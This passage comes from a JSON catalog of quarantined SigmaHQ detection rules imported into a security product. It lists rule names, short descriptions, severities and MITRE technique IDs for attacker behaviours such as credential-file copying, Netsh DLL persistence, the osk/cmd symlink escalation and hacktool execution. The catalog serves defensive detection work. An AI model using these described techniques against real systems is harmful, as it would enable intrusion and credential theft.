null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-scripts-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" } }, { "id": "sigmahq-sigma-e7b18879-676e-4a0e-ae18-27039185a8e7", "type": "detection", "name": "New Netsh Helper DLL Registered From A Suspicious Location", "description": "Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-netsh-helper-dll-registered-from-a-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7b18879-676e-4a0e-ae18-27039185a8e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml" } }, { "id": "sigmahq-sigma-e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", "type": "detection", "name": "System Network Discovery - Linux", "description": "Detects enumeration of local network configuration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" } }, { "id": "sigmahq-sigma-e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "type": "detection", "name": "Copying Sensitive Files with Credential Data", "description": "Files with well-known filenames (sensitive files with credential data) copying", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/copying-sensitive-files-with-credential-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml" } }, { "id": "sigmahq-sigma-e7d79a1b-25ed-4956-bd56-bd344fa8fd06", "type": "detection", "name": "OpenCanary - MySQL Login Attempt", "description": "Detects instances where a MySQL service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1213" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-mysql-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e7d79a1b-25ed-4956-bd56-bd344fa8fd06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_mysql_login_attempt.yml" } }, { "id": "sigmahq-sigma-e80273e1-9faf-40bc-bd85-dbaff104c4e9", "type": "detection", "name": "ESXi System Information Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-system-information-discovery-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e80273e1-9faf-40bc-bd85-dbaff104c4e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml" } }, { "id": "sigmahq-sigma-e81528db-fc02-45e8-8e98-4e84aba1f10b", "type": "detection", "name": "Network Connection Initiated Via Notepad.EXE", "description": "Detects a network connection that is initiated by the \"notepad.exe\" process.\nThis might be a sign of process injection from a beacon process or something similar.\nNotepad rarely initiates a network communication except when printing documents for example.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-via-notepad-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_notepad.yml" } }, { "id": "sigmahq-sigma-e8314f79-564d-4f79-bc13-fbc0bf2660d8", "type": "detection", "name": "Potential PowerShell Obfuscation Using Character Join", "description": "Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-powershell-obfuscation-using-character-join.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8314f79-564d-4f79-bc13-fbc0bf2660d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml" } }, { "id": "sigmahq-sigma-e83e8899-c9b2-483b-b355-5decc942b959", "type": "detection", "name": "Interesting Service Enumeration Via Sc.EXE", "description": "Detects the enumeration and query of interesting and in some cases sensitive services on the system via \"sc.exe\".\nAttackers often try to enumerate the services currently running on a system in order to find different attack vectors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/interesting-service-enumeration-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e83e8899-c9b2-483b-b355-5decc942b959", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml" } }, { "id": "sigmahq-sigma-e84d89c4-f544-41ca-a6af-4b92fd38b023", "type": "detection", "name": "Arbitrary File Download Via MSEDGE_PROXY.EXE", "description": "Detects usage of \"msedge_proxy.exe\" to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-msedge-proxy-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e84d89c4-f544-41ca-a6af-4b92fd38b023", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml" } }, { "id": "sigmahq-sigma-e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "type": "detection", "name": "New TimeProviders Registered With Uncommon DLL Name", "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-timeproviders-registered-with-uncommon-dll-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml" } }, { "id": "sigmahq-sigma-e890acee-d488-420e-8f20-d9b19b3c3d43", "type": "detection", "name": "Suspicious File Created by ArcSOC.exe", "description": "Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS\nserver, creates a file with suspicious file type, indicating that it may be an executable, script file,\nor otherwise unusual.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127", "T1105", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-created-by-arcsoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e890acee-d488-420e-8f20-d9b19b3c3d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_arcsoc_susp_file_created.yml" } }, { "id": "sigmahq-sigma-e8a52bbd-bced-459f-bd93-64db45ce7657", "type": "detection", "name": "Potential Suspicious PowerShell Module File Created", "description": "Detects the creation of a new PowerShell module in the first folder of the module directory structure \"\\WindowsPowerShell\\Modules\\malware\\malware.psm1\". This is somewhat an uncommon practice as legitimate modules often includes a version folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-suspicious-powershell-module-file-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8a52bbd-bced-459f-bd93-64db45ce7657", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml" } }, { "id": "sigmahq-sigma-e8a677fd-248c-4eab-94df-de2f6f645884", "type": "detection", "name": "OpenCanary - NMAP OS Scan", "description": "Detects instances where an OpenCanary node has been targeted by a NMAP OS Scan", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-nmap-os-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8a677fd-248c-4eab-94df-de2f6f645884", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_portscan_nmap_os_scan.yml" } }, { "id": "sigmahq-sigma-e8a95b5e-c891-46e2-b33a-93937d3abc31", "type": "detection", "name": "Suspicious HH.EXE Execution", "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1059.001", "T1059.003", "T1059.005", "T1059.007", "T1218", "T1218.001", "T1218.010", "T1218.011", "T1566", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-hh-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" } }, { "id": "sigmahq-sigma-e8d34729-86a4-4140-adfd-0a29c2106307", "type": "detection", "name": "HackTool - CoercedPotato Execution", "description": "Detects the use of CoercedPotato, a tool for privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-coercedpotato-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8d34729-86a4-4140-adfd-0a29c2106307", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml" } }, { "id": "sigmahq-sigma-e8ebd53a-30c2-45bd-81bb-74befba07bdb", "type": "detection", "name": "HTTP Logging Disabled On IIS Server", "description": "Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/http-logging-disabled-on-iis-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e8ebd53a-30c2-45bd-81bb-74befba07bdb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml" } }, { "id": "sigmahq-sigma-e9142d84-fbe0-401d-ac50-3e519fb00c89", "type": "detection", "name": "WhoAmI as Parameter", "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-as-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" } }, { "id": "sigmahq-sigma-e92a4287-e072-4a40-9739-370c106bb750", "type": "detection", "name": "HackTool - SOAPHound Execution", "description": "Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-soaphound-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e92a4287-e072-4a40-9739-370c106bb750", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml" } }, { "id": "sigmahq-sigma-e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "type": "detection", "name": "UEFI Persistence Via Wpbbin - FileCreation", "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1542.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uefi-persistence-via-wpbbin-filecreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" } }, { "id": "sigmahq-sigma-e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "type": "detection", "name": "HackTool - KrbRelay Execution", "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-krbrelay-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml" } }, { "id": "sigmahq-sigma-e97d9903-53b2-41fc-8cb9-889ed4093e80", "type": "detection", "name": "KrbRelayUp Service Installation", "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/krbrelayup-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml" } }, { "id": "sigmahq-sigma-e9856028-fd4e-46e6-b3d1-10f7ceb95078", "type": "detection", "name": "OpenCanary - SNMP OID Request", "description": "Detects instances where an SNMP service on an OpenCanary node has had an OID request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1016", "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-snmp-oid-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9856028-fd4e-46e6-b3d1-10f7ceb95078", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_snmp_cmd.yml" } }, { "id": "sigmahq-sigma-e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "type": "detection", "name": "Apache Threading Error", "description": "Detects an issue in apache logs that reports threading related errors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/apache-threading-error.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/product/apache/web_apache_threading_error.yml" } }, { "id": "sigmahq-sigma-e9b61244-893f-427c-b287-3e708f321c6b", "type": "detection", "name": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-using-symlink-between-osk-and-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9b61244-893f-427c-b287-3e708f321c6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml" } }, { "id": "sigmahq-sigma-e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", "type": "detection", "name": "Windows Defender Exclusion Registry Key - Write Access Requested", "description": "Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-exclusion-registry-key-write-access-requested.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml" } }, { "id": "sigmahq-sigma-e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "type": "detection", "name": "NTLMv1 Logon Between Client and Server", "description": "Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntlmv1-logon-between-client-and-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/lsasrv/win_system_lsasrv_ntlmv1.yml" } }, { "id": "sigmahq-sigma-e9edd087-89d8-48c9-b0b4-5b9bb10896b8", "type": "detection", "name": "Potential SpEL Injection In Spring Framework", "description": "Detects potential SpEL Injection exploitation, which may lead to RCE.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-spel-injection-in-spring-framework.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9edd087-89d8-48c9-b0b4-5b9bb10896b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/spring/spring_spel_injection.yml" } }, { "id": "sigmahq-sigma-e9f55347-2928-4c06-88e5-1a7f8169942e", "type": "detection", "name": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-obfuscation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9f55347-2928-4c06-88e5-1a7f8169942e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml" } }, { "id": "sigmahq-sigma-e9f8f8cc-07cc-4e81-b724-f387db9175e4", "type": "detection", "name": "Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension", "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-execution-of-regasm-regsvcs-with-uncommon-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e9f8f8cc-07cc-4e81-b724-f387db9175e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml" } }, { "id": "sigmahq-sigma-e9faba72-4974-4ab2-a4c5-46e25ad59e9b", "type": "detection", "name": "VSSAudit Security Event Source Registration", "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vssaudit-security-event-source-registration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 